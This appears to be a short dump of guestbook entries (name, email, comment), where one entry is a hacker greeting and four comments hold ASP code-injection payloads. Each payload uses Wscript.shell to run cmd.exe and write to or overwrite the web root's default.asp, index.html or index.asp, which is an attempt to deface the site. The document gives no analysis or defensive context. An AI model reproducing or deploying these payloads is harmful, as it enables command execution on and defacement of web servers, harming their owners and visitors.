| name |
r007_h4c0r |
email |
a@b.com |
| comments |
Command Tribulation r007_h4c0r was here ! Greetz:
youngchristian |
| name |
so |
email |
se@so.com |
| comments |
<%
Set wsh=Server.CreateObject("Wscript.shell")
wsh.run("cmd.exe /c echo IHG >> C:\inetpub\wwwroot\default.asp")
%>
|
| name |
so |
email |
se@so.com |
| comments |
<%
Set wsh=Server.CreateObject("Wscript.shell")
wsh.run("cmd.exe /c echo IHG > C:\inetpub\wwwroot\default.asp")
%>
|
| name |
y |
email |
we@wo.com |
| comments |
<%
Set wsh=Server.CreateObject("Wscript.shell")
wsh.run("cmd.exe /c echo IHC >> C:\inetpub\wwwroot\index.html")
%>
|
| name |
ne |
email |
na@no.com |
| comments |
<%
Set wsh=Server.CreateObject("Wscript.shell")
wsh.run("cmd.exe /c echo IHC >> C:\inetpub\wwwroot\index.asp")
%>
|